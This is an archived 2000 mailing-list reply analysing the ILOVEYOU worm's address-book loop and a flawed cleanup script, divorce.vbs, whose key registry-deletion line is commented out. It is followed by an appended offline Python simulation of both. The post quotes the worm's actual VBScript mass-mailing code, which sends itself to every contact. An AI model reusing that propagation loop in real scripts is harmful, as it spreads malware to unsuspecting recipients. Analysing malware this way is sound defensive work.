Vulnerability Development mailing list archives
Re: Opportunist?
From: des () FLOOD PING UIO NO (Dag-Erling Smorgrav)
Date: Fri, 5 May 2000 16:49:10 +0200
"GALES,SIMON (Non-A-ColSprings,ex1)" <george_gales () NON HP COM> writes:
I took a quick look at it, and was wondering just what it was doing fiddling in the MAPI address books... does the ILU worm write to the address book(s)?
No, but it loops through the address book and writes stuff to the registry for each entry in the address book. Here's the relevant excerpt from LOVELETTER (my indentation):

    for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1
        regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
        if (regv="") then
            regv=1
        end if
        if (int(a.AddressEntries.Count)>int(regv)) then
            for ctrentries=1 to a.AddressEntries.Count
                malead=a.AddressEntries(x)
                regad=""
                regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
                if (regad="") then
                    set male=out.CreateItem(0)
                    male.Recipients.Add(malead)
                    male.Subject = "ILOVEYOU"
                    male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
                    male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
                    male.Send
                    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
                end if
                x=x+1
            next
            regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
        else
            regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
        end if
    next

The corresponding code in divorce.vbs is supposed to remove those entries, but the crucial line is commented out. It looks like the authors just cut & pasted code from LOVELETTER and changed some words here and there to reverse the effect. Here's the relevant excerpt from divorce.vbs (authors' indentation):

    for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1
        if (int(a.AddressEntries.Count)>1) then
            for ctrentries=1 to a.AddressEntries.Count
                malead=a.AddressEntries(x)
                regad=""
                regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
                if (not regad="") then
                    log_to_disk("Deleting HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
  !                 rem regedit.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead
                end if
                x=x+1
            next
        end if
    next

The line with a bang in the margin would remove the registry entries created by LOVELETTER, if it weren't commented out.
This script/batchfile only cleans up .vbs files, but I seem to remember someone mentioning overwritten .js/.mp3 files among others? Or is it just my end-of-week fogginess?
LOVELETTER deletes mp3 etc. files, and replaces them with .vbs files with the same name, so the offending files all end with .vbs.

DES
--
Dag-Erling Smorgrav - des () flood ping uio no
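To make the bookkeeping in the two excerpts above concrete, here is an added example (not code from the list post, from LOVELETTER or from divorce.vbs) that models the worm's address-book loop and the cleanup divorce.vbs intended, using plain dicts for the registry and the MAPI address book and recording recipients instead of sending anything. The sample address book, the contact names and the function names are constructed for the example. Running it shows three things the excerpts imply but do not spell out: the per-list counter means a list is only rescanned when it has grown, the default counter of 1 means a list with a single entry is never mailed from, and the posted cleanup, with its RegDelete commented out, leaves every per-entry marker in place (and even the working version never touches the per-list counters).

```python
# Added example (not code from the list post, LOVELETTER or divorce.vbs):
# an offline model of the worm's address-book loop and of the cleanup that
# divorce.vbs meant to perform.  The registry and the MAPI address book are
# plain dicts, and "sending" only records the recipient, so it runs anywhere.

WAB = r"HKEY_CURRENT_USER\Software\Microsoft\WAB"   # key both scripts use


def spread(address_lists, registry):
    """Mirror the LOVELETTER excerpt.

    address_lists: {list_name: [entry_name, ...]}  (stands in for mapi.AddressLists)
    registry:      {value_path: value}             (mutated like RegWrite would)
    Returns the recipients that would have been mailed, in order.
    A missing registry value is modelled as the empty string the script tests for.
    """
    sent = []
    for list_name, entries in address_lists.items():
        list_path = f"{WAB}\\{list_name}"
        regv = registry.get(list_path, "")
        if regv == "":
            regv = 1                          # no counter yet: treated as 1
        # only rescan a list whose entry count grew past the stored counter
        if int(len(entries)) > int(regv):
            for entry in entries:
                entry_path = f"{WAB}\\{entry}"
                if registry.get(entry_path, "") == "":
                    sent.append(entry)        # male.Send would happen here
                    registry[entry_path] = 1  # REG_DWORD 1: "already mailed"
        # both branches of the original store the current list size
        registry[list_path] = len(entries)
    return sent


def cleanup(address_lists, registry, delete=True):
    """Mirror the divorce.vbs excerpt.

    delete=False reproduces the posted script, whose RegDelete line is
    commented out, so it only logs; delete=True is what that line would do.
    Returns the value paths the script logs as "Deleting".
    """
    logged = []
    for entries in address_lists.values():
        if int(len(entries)) > 1:             # same > 1 gate as the worm's default counter
            for entry in entries:
                entry_path = f"{WAB}\\{entry}"
                if registry.get(entry_path, "") != "":
                    logged.append(entry_path)
                    if delete:
                        del registry[entry_path]
    return logged


def _marked(address_lists, registry):
    """Entries that still carry the worm's per-entry marker."""
    return sorted(e for lst in address_lists.values() for e in lst
                  if registry.get(f"{WAB}\\{e}", "") != "")


def demo():
    """Run the model on a constructed address book and return what happened."""
    registry = {}
    # constructed sample data, not taken from any real address book
    book = {"Contacts": ["alice", "bob"], "Family": ["carol"]}

    first = spread(book, registry)    # alice and bob; Family has 1 entry and 1 > 1 is false
    second = spread(book, registry)   # counters now equal the list sizes: nothing rescanned
    book["Contacts"].append("dave")
    third = spread(book, registry)    # Contacts grew 2 -> 3: only the unmarked entry

    cleanup(book, registry, delete=False)             # the posted divorce.vbs: logs only
    marked_posted = _marked(book, registry)
    removed = cleanup(book, registry, delete=True)    # with the RegDelete line live
    marked_real = _marked(book, registry)
    leftover = sorted(registry)                       # per-list counters are never removed

    return {
        "first_run": first,
        "second_run": second,
        "third_run": third,
        "marked_after_posted_cleanup": marked_posted,
        "removed": removed,
        "marked_after_real_cleanup": marked_real,
        "leftover": leftover,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The model follows the excerpts as written; it does not try to reproduce how WScript.Shell's RegRead actually behaves under On Error Resume Next when a value is missing, so treat it as a reading of the logic rather than a trace of the real worm.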
Current thread:
- Re: Opportunist? Dag-Erling Smorgrav (May 05)
- <Possible follow-ups>
- Re: Opportunist? GALES,SIMON (Non-A-ColSprings,ex1) (May 05)
- Re: Opportunist? Dag-Erling Smorgrav (May 05)
- Re: Opportunist? Dag-Erling Smorgrav (May 07)